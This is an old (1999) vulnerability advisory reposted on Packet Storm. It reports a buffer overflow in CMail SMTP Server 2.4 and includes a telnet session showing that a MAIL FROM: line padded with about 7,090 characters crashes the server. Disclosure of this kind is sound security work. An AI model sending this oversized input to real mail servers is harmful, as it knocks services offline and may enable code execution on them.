cmail-2.4.txt

1999-11-02T00:00:00
ID PACKETSTORM:11590
Type packetstorm
Reporter Underground Security Systems Research
Modified 1999-11-02T00:00:00

Description

                                        
                                            `CMail SMTP Server  
Version 2.4:   
Remotely exploitable buffer overflow  
  
CMail SMTP Server Version 2.4 Problem: We found a buffer overflow in  
the CMail SMTP service (long MAIL FROM:) that may allow an attacker to  
execute arbitrary code on the target server, it is based on the eEye  
pointed out overflows in cmail 2.3 >:-] Which was never fixed...   
software vendors still not taking security issues seriously.  
  
Example:   
  
[cham@guilt cham]$ telnet example.com 25 Trying  
example.com...  
Connected to example.com. Escape character is '^]'.  
220 SMTP services ready. Computalynx CMail Server Version: 2.4  
helo ussr  
250 Hello ussr [yourip], how are you today?   
MAIL FROM: cmail<[buffer]@cmaildotcom.com>   
Where [buffer] is aprox. 7090 characters.  
At his point the server overflows and crashes.   
  
  
Just a typical buffer overflow that should  
have been fixed in version 2.3 when it was pointed out to them.  
  
Luck Martins   
  
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h   
  
WWW.USSRBACK.COM  
  
`